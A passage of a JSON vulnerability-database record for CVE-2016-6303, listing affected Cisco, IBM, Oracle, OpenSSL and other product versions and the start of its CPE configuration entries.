"cisco", "version": "11.6.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "tuxedo", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.1.0" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media and", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3103200" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.24" }, { "model": "content security appliance update servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "videoscape anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.7.2" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "transportation management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.9" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.3" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.9" }, { "model": "macos", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "10.12.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.13" }, { "model": "universal small cell iuh", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.5" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1.1" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.2" }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.4" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-326.1" }, { "model": "unity express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.1.8" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.15" }, { "model": "small business series managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10006.1" }, { "model": "telepresence isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "series smart plus switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2200" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.21" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "access manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.1.4.3.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "telepresence tx9000 series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8zf", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.15.17.3.14" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0x" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "telepresence system series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30006.1" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.13" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.12" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "ucs b-series blade servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.1" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.9" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.6.0.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3381" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.32" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.9" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "mds series multilayer switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-3.0" }, { "model": "project openssl 1.0.0p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.1" }, { "model": "project openssl 1.0.0t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.1" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence tx9000 series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.2.0" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart net total care local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.12" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.8.9" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "nexus series fabric switches aci mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "prime performance manager sp1611", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.7" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.22" }, { "model": "packetshaper", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.2" }, { "model": "unified ip phone 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.23" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.10" }, { "model": "telepresence server and mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "701087100" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.1.3" }, { "model": "project openssl 0.9.8zc", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.19" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270015.5(3)" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.30" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.4" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.11" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational application developer for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3376" }, { "model": "digital media manager 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified workforce optimization quality management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "telepresence integrator c series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "project openssl m", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.13" }, { "model": "spa122 analog telephone adapter with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "cloud object storage", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8zd", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.5" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "project openssl 1.0.0h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.4" }, { "model": "project openssl", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": "1.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.4" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.7.0" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ace application control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "47100" }, { "model": "anyconnect secure mobility client for mac os", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "x0" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.2.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime infrastructure plug and play standalone gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.6" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.19" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.3" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for iphone and ipad", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.2" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4.1" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.8" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mcu", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.5(1.89)" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.003(002)" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.31" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8204.4" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.3" }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.13" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.400" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.12" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "prime network", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "431" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "transportation management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.14" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.26" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "network analysis module 6.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence system ex series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "mxe series media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "ip series phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.27" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.17" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.18" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2.0.0" }, { "model": "unified meetingplace 8.6mr1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.406-3402.103" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.9" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.2" }, { "model": "spa525g 5-line ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.0" }, { "model": "secure access control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "unified ip conference phone for third-party call control 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "unified ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "nexus series fabric switches aci mode", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.6" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl m", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1157986", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7" }, { "model": "registered envelope service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.2" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.23" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings client hosted t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.15" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.2" }, { "model": "unified meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "project openssl 1.0.0q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1.30" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.4.1.5.0" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.13" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.402" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null } ], "sources": [ { "db": "BID", "id": "92984" }, { "db": "JVNDB", "id": "JVNDB-2016-004782" }, { "db": "NVD", "id": "CVE-2016-6303" }, { "db": "CNNVD", "id": "CNNVD-201609-320" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.12.16", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.6.0", "versionStartIncluding": "4.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.6.0", "versionStartIncluding": "6.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 